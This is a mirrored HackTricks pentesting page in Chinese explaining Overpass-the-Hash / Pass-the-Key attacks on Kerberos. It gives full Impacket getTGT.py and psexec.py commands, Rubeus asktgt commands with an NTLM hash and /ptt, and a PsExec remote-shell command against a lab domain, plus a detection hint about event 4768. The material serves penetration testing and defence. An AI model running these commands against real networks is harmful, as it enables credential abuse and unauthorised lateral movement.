mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 07:01:09 +00:00
5 KiB
5 KiB
通过哈希/传递密钥
☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 YouTube 🎥
- 你在一家网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想获得PEASS的最新版本或下载HackTricks的PDF吗?请查看订阅计划!
- 发现我们的独家NFTs收藏品The PEASS Family
- 获取官方PEASS和HackTricks周边产品
- 加入💬 Discord群组或电报群组或关注我在Twitter上的🐦@carlospolopm。
- 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。
通过哈希/传递密钥(PTK)
这种攻击旨在使用用户的NTLM哈希或AES密钥请求Kerberos票据,作为常见的通过NTLM协议传递哈希的替代方法。因此,在禁用NTLM协议并只允许Kerberos作为认证协议的网络中,这可能特别有用。
为了执行此攻击,需要目标用户帐户的NTLM哈希(或密码)。因此,一旦获得用户哈希,就可以为该帐户请求TGT。最后,可以访问任何具有用户帐户权限的服务或计算机。
python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
您可以使用**-aesKey [AES密钥]来指定使用AES256**。
您还可以将票据与其他工具一起使用,如smbexec.py或wmiexec.py
可能出现的问题:
- PyAsn1Error('NamedTypes can cast only scalar values'):通过将impacket更新到最新版本来解决。
- KDC无法找到名称:通过使用主机名而不是IP地址来解决,因为Kerberos KDC无法识别IP地址。
.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
这种攻击类似于Pass the Key,但不是使用哈希值来请求票据,而是窃取票据本身并用其作为所有者进行身份验证。
{% hint style="warning" %}
当请求TGT时,会生成事件4768:请求了一个Kerberos身份验证票据(TGT)
。从上面的输出中可以看到KeyType为RC4-HMAC(0x17),但Windows的默认类型现在是AES256(0x12)。
{% endhint %}
.\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec
参考资料
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一家网络安全公司工作吗?想要在HackTricks中宣传你的公司吗?或者你想要获取PEASS的最新版本或下载PDF格式的HackTricks吗?请查看订阅计划!
- 发现我们的独家NFTs收藏品——The PEASS Family
- 获得官方PEASS和HackTricks周边产品
- 加入💬 Discord群组或电报群组,或者关注我在Twitter上的🐦@carlospolopm。
- 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。